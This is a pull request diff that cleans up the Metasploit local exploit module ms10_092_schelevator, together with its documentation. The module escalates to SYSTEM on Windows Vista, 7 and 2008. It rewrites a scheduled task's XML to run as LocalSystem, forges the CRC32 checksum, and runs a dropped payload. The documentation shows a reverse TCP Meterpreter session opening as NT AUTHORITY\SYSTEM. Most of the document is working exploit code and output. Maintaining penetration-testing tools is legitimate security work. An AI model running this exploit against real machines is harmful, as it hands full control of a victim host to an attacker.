### PR TITLE
ms10_092_schelevator: Cleanup

### DIFF
--- a/documentation/modules/exploit/windows/local/ms10_092_schelevator.md
+++ b/documentation/modules/exploit/windows/local/ms10_092_schelevator.md
@@ -1,51 +1,65 @@
 ## Vulnerable Application
 
-This module exploits the Task Scheduler 2.0 XML 0day exploited by Stuxnet. When processing task files, the Windows Task Scheduler only uses a CRC32 checksum to validate that the file has not been tampered with. Also, In a default configuration, normal users can read and write the task files that they have created. By modifying the task file and creating a CRC32 collision, an attacker can execute arbitrary commands with SYSTEM privileges.
-
-## Scenarios
+This module exploits the Task Scheduler 2.0 XML 0day exploited by Stuxnet.
+When processing task files, the Windows Task Scheduler only uses a CRC32
+checksum to validate that the file has not been tampered with. Also, In a default
+configuration, normal users can read and write the task files that they have
+created. By modifying the task file and creating a CRC32 collision, an attacker
+can execute arbitrary commands with SYSTEM privileges.
 
 ## Verification Steps
 
 1. Start msfconsole
-2. Do: `use modules/exploits/windows/local/ms10_092_schelevator`
-3. Do: `set SESSION [#]`
-4. Do: `run`
+2. Get a Meterpreter session
+3. Do: `use modules/exploits/windows/local/ms10_092_schelevator`
+4. Do: `set SESSION <session id>`
+5. Do: `run`
 
-### A run on Windows Vista (Build 6000) and Kali Linux 2019.3
+## Options
 
-  ```
-  msf > use modules/exploits/windows/local/ms10_092_schelevator
-  msf exploit(windows/local/ms10_092_schelevator) > set SESSION 1
-    SESSION => 1
-  msf5 exploit(windows/local/ms10_092_schelevator) > run  
-    [*] Started reverse TCP handler on 192.168.1.3:4444
-    [*] Preparing payload at C:\Users\test\AppData\Local\Temp\CItOOtB.exe
-    [*] Creating task: TzAZ6H4K
-    [*] SUCCESS: The scheduled task "TzAZ6H4K" has successfully been created.
-    [*] SCHELEVATOR
-    [*] Reading the task file contents from C:\Windows\system32\tasks\TzAZ6H4K...
-    [*] Original CRC32: 0x69b1db25
-    [*] Final CRC32: 0x69b1db25
-    [*] Writing our modified content back...
-    [*] Validating task: TzAZ6H4K
-    [*]
-    [*] Folder: \
-    [*] TaskName                                   Next Run Time        Status
-    [*] ========================================== ==================== ===============
-    [*] TzAZ6H4K                                   12/1/2019 10:41:00 A Ready
-    [*] SCHELEVATOR
-    [*] Disabling the task...
-    [*] SUCCESS: The parameters of scheduled task "TzAZ6H4K" have been changed.
-    [*] SCHELEVATOR
-    [*] Enabling the task...
-    [*] SUCCESS: The parameters of scheduled task "TzAZ6H4K" have been changed.
-    [*] SCHELEVATOR
-    [*] Executing the task...
-    [*] Sending stage (180291 bytes) to 192.168.1.2
-    [*] SUCCESS: Attempted to run the scheduled task "TzAZ6H4K".
-    [*] SCHELEVATOR
-    [*] Deleting the task...
-    [*] Meterpreter session 2 opened (192.168.1.3:4444 -> 192.168.1.2:49249) at 2019-11-27 10:42:02 -0700
-    [*] SUCCESS: The scheduled task "TzAZ6H4K" was successfully deleted.
-    [*] SCHELEVATOR
-  ```
+### TASKNAME
+
+A name for the created task (default is random)
+
+## Scenarios
+
+### Windows Server 2008 SP1 (x64)
+
+```
+msf6 > use exploit/windows/local/ms10_092_schelevator
+[*] Using configured payload windows/x64/meterpreter/reverse_tcp
+msf6 exploit(windows/local/ms10_092_schelevator) > set session 1
+session => 1
+msf6 exploit(windows/local/ms10_092_schelevator) > run
+
+[*] Started reverse TCP handler on 192.168.200.130:4444
+[*] Running automatic check ("set AutoCheck false" to disable)
+[!] The service is running, but could not be validated.
+[*] Preparing payload at C:\Users\user\AppData\Local\Temp\QMGmEeEmFFq.exe
+[*] Creating task: qThxbR37
+[*] Reading the task file contents from C:\Windows\system32\tasks\qThxbR37...
+[*] Original CRC32: 0xec6cfb1d
+[*] Final CRC32: 0xec6cfb1d
+[*] Writing our modified content back...
+[*] Validating task: qThxbR37
+[*] Disabling the task...
+[*] SUCCESS: The parameters of scheduled task "qThxbR37" have been changed.
+[*] Enabling the task...
+[*] SUCCESS: The parameters of scheduled task "qThxbR37" have been changed.
+[*] Executing the task...
+[*] Sending stage (200774 bytes) to 192.168.200.218
+[*] Meterpreter session 2 opened (192.168.200.130:4444 -> 192.168.200.218:52347) at 2022-08-19 00:53:17 -0400
+[*] Deleting task pcT2p46d0...
+
+meterpreter > getuid
+Server username: NT AUTHORITY\SYSTEM
+meterpreter > sysinfo
+Computer        : WIN-17B09RRRJTG
+OS              : Windows 2008 (6.0 Build 6001, Service Pack 1).
+Architecture    : x64
+System Language : en_US
+Domain          : CORP
+Logged On Users : 3
+Meterpreter     : x64/windows
+meterpreter >
+```

--- a/modules/exploits/windows/local/ms10_092_schelevator.rb
+++ b/modules/exploits/windows/local/ms10_092_schelevator.rb
@@ -9,7 +9,11 @@ class MetasploitModule < Msf::Exploit::Local
   Rank = ExcellentRanking
 
   include Msf::Exploit::EXE
+  include Msf::Post::Common
   include Msf::Post::File
+  include Msf::Post::Windows::Priv
+  include Msf::Post::Windows::TaskScheduler
+  prepend Msf::Exploit::Remote::AutoCheck
 
   def initialize(info = {})
     super(
@@ -29,11 +33,28 @@ class MetasploitModule < Msf::Exploit::Local
           },
           'License' => MSF_LICENSE,
           'Author' => [ 'jduck' ],
-          'Arch' => [ ARCH_X86, ARCH_X64 ],
           'Platform' => [ 'win' ],
           'SessionTypes' => [ 'meterpreter' ],
           'Targets' => [
-            [ 'Windows Vista, 7, and 2008', {} ],
+            [
+              'Windows Vista / 7 / 2008 (Dropper)',
+              {
+                'Platform' => 'win',
+                'Arch' => [ARCH_X86, ARCH_X64],
+                'DefaultOptions' => { 'PAYLOAD' => 'windows/shell/reverse_tcp' },
+                'Type' => :win_dropper
+              }
+            ],
+            [
+              'Windows Vista / 7 / 2008 (Command)',
+              {
+                'Platform' => 'win',
+                'Arch' => ARCH_CMD,
+                'DefaultOptions' => { 'PAYLOAD' => 'cmd/windows/generic' },
+                'Payload' => { 'Space' => 261 },
+                'Type' => :win_command
+              }
+            ]
           ],
           'References' => [
             [ 'OSVDB', '68518' ],
@@ -44,6 +65,11 @@ class MetasploitModule < Msf::Exploit::Local
           ],
           'DisclosureDate' => '2010-09-13',
           'DefaultTarget' => 0,
+          'Notes' => {
+            'Stability' => [ CRASH_SAFE ],
+            'Reliability' => [ REPEATABLE_SESSION ],
+            'SideEffects' => [ IOC_IN_LOGS, ARTIFACTS_ON_DISK ]
+          },
           'Compat' => {
             'Meterpreter' => {
               'Commands' => %w[
@@ -52,6 +78,7 @@ class MetasploitModule < Msf::Exploit::Local
                 core_channel_read
                 core_channel_write
                 stdapi_sys_config_getenv
+                stdapi_sys_config_getuid
               ]
             }
           }
@@ -60,77 +87,72 @@ class MetasploitModule < Msf::Exploit::Local
     )
 
     register_options([
-      OptString.new("CMD", [ false, "Command to execute instead of a payload" ]),
-      OptString.new("TASKNAME", [ false, "A name for the created task (default random)" ]),
+      OptString.new('TASKNAME', [ false, 'A name for the created task (default random)' ]),
     ])
+    deregister_options(
+      'ScheduleType',
+      'ScheduleModifier',
+      'ScheduleRemoteSystem',
+      'ScheduleUsername',
+      'SchedulePassword',
+      'ScheduleObfuscationTechnique'
+    )
   end
 
   def check
-    vuln = false
-    winver = sysinfo["OS"]
-    affected = [ 'Windows Vista', 'Windows 7', 'Windows 2008' ]
-    affected.each { |v|
-      if winver.include? v
-        vuln = true
-        break
-      end
-    }
-    if not vuln
-      return Exploit::CheckCode::Safe
+    return CheckCode::Safe("Target OS #{session.platform} is not vulnerable") unless session.platform == 'windows'
+
+    system_info = sysinfo
+    return CheckCode::Unknown('Could not retrieve OS system information.') unless system_info
+
+    [ 'Windows Vista', 'Windows 7', 'Windows 2008' ].each do |v|
+      return CheckCode::Detected if system_info['OS'].include?(v)
     end
 
-    return Exploit::CheckCode::Appears
+    CheckCode::Safe("#{system_info['OS']} is not vulnerable")
   end
 
   def exploit
-    if sysinfo["Architecture"] == ARCH_X64 && session.arch == ARCH_X86
-      #
-      # WOW64 Filesystem Redirection prevents us opening the file directly. To make matters
-      # worse, meterpreter/railgun creates things in a new thread, making it much more
-      # difficult to disable via Wow64EnableWow64FsRedirection. Until we can get around this,
-      # offer a workaround and error out.
-      #
-      fail_with(Failure::NoTarget, "Running against via WOW64 is not supported, try using an x64 meterpreter...")
+    fail_with(Failure::None, 'Session is already elevated') if is_system?
+    fail_with(Failure::NoTarget, 'This exploit requires a meterpreter session') unless session.type == 'meterpreter'
+
+    #
+    # WOW64 Filesystem Redirection prevents us opening the file directly. To make matters
+    # worse, meterpreter/railgun creates things in a new thread, making it much more
+    # difficult to disable via Wow64EnableWow64FsRedirection. Until we can get around this,
+    # offer a workaround and error out.
+    #
+    if sysinfo['Architecture'] == ARCH_X64 && session.arch == ARCH_X86
+      fail_with(Failure::NoTarget, 'Running against via WOW64 is not supported, try using an x64 meterpreter...')
     end
 
-    if check == Exploit::CheckCode::Safe
-      print_error("#{sysinfo["OS"]} is not vulnerable.")
-      return
-    end
+    @taskname = datastore['TASKNAME'] || Rex::Text.rand_text_alphanumeric(8..15)
 
-    taskname = datastore["TASKNAME"] || nil
-    cmd = datastore["CMD"] || nil
-    upload_fn = nil
-
-    tempdir = session.sys.config.getenv('TEMP')
-    unless cmd
-      # Get the exe payload.
+    case target['Type']
+    when :win_command
+      cmd = payload.encoded
+      print_status("Using command: #{cmd}")
+    when :win_dropper
+      tempdir = get_env('TEMP')
       exe = generate_payload_exe
-      # and placing it on the target in %TEMP%
-      tempexename = Rex::Text.rand_text_alpha(rand(8) + 6)
-      cmd = tempdir + "\\" + tempexename + ".exe"
-
+      cmd = "#{tempdir}\\#{Rex::Text.rand_text_alpha(6..13)}.exe"
       print_status("Preparing payload at #{cmd}")
       write_file(cmd, exe)
-    else
-      print_status("Using command: #{cmd}")
     end
 
     #
     # Create a new task to do our bidding, but make sure it doesn't run.
     #
-    taskname ||= Rex::Text.rand_text_alphanumeric(8 + rand(8))
-    sysdir = session.sys.config.getenv('SystemRoot')
-    taskfile = "#{sysdir}\\system32\\tasks\\#{taskname}"
+    sysdir = get_env('SystemRoot')
+    taskfile = "#{sysdir}\\system32\\tasks\\#{@taskname}"
 
-    print_status("Creating task: #{taskname}")
-    cmdline = "schtasks.exe /create /tn #{taskname} /tr \"#{cmd}\" /sc monthly /f"
-    exec_schtasks(cmdline, "create the task")
+    print_status("Creating task: #{@taskname}")
+    task_create(@taskname, cmd, task_type: 'MONTHLY', obfuscation: 'NONE', runas: client.sys.config.getuid)
 
     #
-    # Read the contents of the newly creates task file
+    # Read the contents of the newly created task file
     #
-    content = read_task_file(taskname, taskfile)
+    content = read_task_file(taskfile)
 
     #
     # Double-check that we got what we expect.
@@ -151,7 +173,7 @@ class MetasploitModule < Msf::Exploit::Local
     # Record the crc32 for later calculations
     #
     old_crc32 = crc32(content)
-    print_status("Original CRC32: 0x%x" % old_crc32)
+    print_status('Original CRC32: ' + format('0x%.8x', old_crc32))
 
     #
     # Convert the file contents from unicode
@@ -162,12 +184,12 @@ class MetasploitModule < Msf::Exploit::Local
     # Mangle the contents to now run with SYSTEM privileges
     #
     content.gsub!('LeastPrivilege', 'HighestAvailable')
-    content.gsub!(/<UserId>.*<\/UserId>/, '<UserId>S-1-5-18</UserId>')
-    content.gsub!(/<Author>.*<\/Author>/, '<Author>S-1-5-18</Author>')
+    content.gsub!(%r{<UserId>.*</UserId>}, '<UserId>S-1-5-18</UserId>')
+    content.gsub!(%r{<Author>.*</Author>}, '<Author>S-1-5-18</Author>')
     # content.gsub!('<LogonType>InteractiveToken</LogonType>', '<LogonType>Password</LogonType>')
     content.gsub!('Principal id="Author"', 'Principal id="LocalSystem"')
     content.gsub!('Actions Context="Author"', 'Actions Context="LocalSystem"')
-    content << "<!-- ZZ -->"
+    content << '<!-- ZZ -->'
 
     #
     # Convert it back to unicode
@@ -179,47 +201,30 @@ class MetasploitModule < Msf::Exploit::Local
     #
     fix_crc32(content, old_crc32)
     new_crc32 = crc32(content)
-    print_status("Final CRC32: 0x%x" % new_crc32)
+    print_status('Final CRC32: ' + format('0x%x', new_crc32))
 
-    #
-    # Write the new content back
-    #
-    print_status("Writing our modified content back...")
-    fd = session.fs.file.new(taskfile, "wb")
-    fd.write "\xff\xfe" + content
-    fd.close
+    print_status('Writing our modified content back...')
+    write_file(taskfile, "\xff\xfe#{content}")
 
-    #
-    # Validate our results
-    #
-    print_status("Validating task: #{taskname}")
-    exec_schtasks("schtasks.exe /query /tn #{taskname}", "validate the task")
+    print_status("Validating task: #{@taskname}")
+    task_query(@taskname)
 
-    #
-    # Run the task :-)
-    #
-    print_status("Disabling the task...")
-    exec_schtasks("schtasks.exe /change /tn #{taskname} /disable", "disable the task")
+    print_status('Disabling the task...')
+    fail_with(Failure::Unknown, 'Could not disable task') unless exec_schtasks("schtasks.exe /change /tn #{@taskname} /disable")
 
-    print_status("Enabling the task...")
-    exec_schtasks("schtasks.exe /change /tn #{taskname} /enable", "enable the task")
+    print_status('Enabling the task...')
+    fail_with(Failure::Unknown, 'Could not enable task') unless exec_schtasks("schtasks.exe /change /tn #{@taskname} /enable")
 
-    print_status("Executing the task...")
-    exec_schtasks("schtasks.exe /run /tn #{taskname}", "run the task")
-
-    #
-    # And delete it.
-    #
-    print_status("Deleting the task...")
-    exec_schtasks("schtasks.exe /delete /f /tn #{taskname}", "delete the task")
+    print_status('Executing the task...')
+    task_start(@taskname)
   end
 
   def crc32(data)
     table = Zlib.crc_table
     crc = 0xffffffff
-    data.unpack('C*').each { |b|
+    data.unpack('C*').each do |b|
       crc = table[(crc & 0xff) ^ b] ^ (crc >> 8)
-    }
+    end
     crc
   end
 
@@ -298,39 +303,40 @@ class MetasploitModule < Msf::Exploit::Local
     crc = crc32(data[0, data.length - 12])
     data[-12, 4] = [crc].pack('V')
 
-    data[-12, 12].unpack('C*').reverse.each { |b|
+    data[-12, 12].unpack('C*').reverse.each do |b|
       old_crc = ((old_crc << 8) ^ bwd_table[old_crc >> 24] ^ b) & 0xffffffff
-    }
+    end
     data[-12, 4] = [old_crc].pack('V')
   end
 
-  def exec_schtasks(cmdline, purpose)
-    cmdline = "/c #{cmdline.strip}"
-    lns = cmd_exec('cmd.exe', cmdline)
-
-    success = false
-    lns.each_line { |ln|
+  def exec_schtasks(cmdline)
+    lns = cmd_exec('cmd.exe', "/c #{cmdline.strip}")
+    lns&.each_line do |ln|
       ln.chomp!
-      if ln =~ /^SUCCESS\:\s/
-        success = true
-        print_status(ln)
-      else
-        print_status(ln)
-      end
-    }
+      print_status(ln)
+      return true if ln.starts_with?('SUCCESS:')
+    end
+    false
   end
 
-  def read_task_file(taskname, taskfile)
+  def read_task_file(taskfile)
     print_status("Reading the task file contents from #{taskfile}...")
 
-    # Can't read the file directly on 2008?
+    # Can't read the file directly on Windows Server 2008
+    # use session.fs.file.new instead
     content = ''
-    fd = session.fs.file.new(taskfile, "rb")
-    until fd.eof?
-      content << fd.read
-    end
+    fd = session.fs.file.new(taskfile, 'rb')
+    content << fd.read until fd.eof?
     fd.close
-
     content
+  end
+
+  def cleanup
+    return unless @taskname
+
+    print_status("Deleting task #{@taskname}...")
+    task_delete(@taskname, obfuscation: 'NONE')
+  ensure
+    super
   end
 end


### PR DESCRIPTION
Resolves Rubocop violations.

Adds `Notes` module meta information.

Update documentation.

Use AutoCheck.

Use `Msf::Post::Windows::TaskScheduler`.

Ensure the scheduled task is removed if exploitation fails.

The `CMD` option has been removed, favoring allowing users to select between a dropper target or a command target with the `cmd/windows/generic` payload instead. This is a more modern Metasploit-y approach. This also allows specifying the payload space (`261`) in the module meta info.
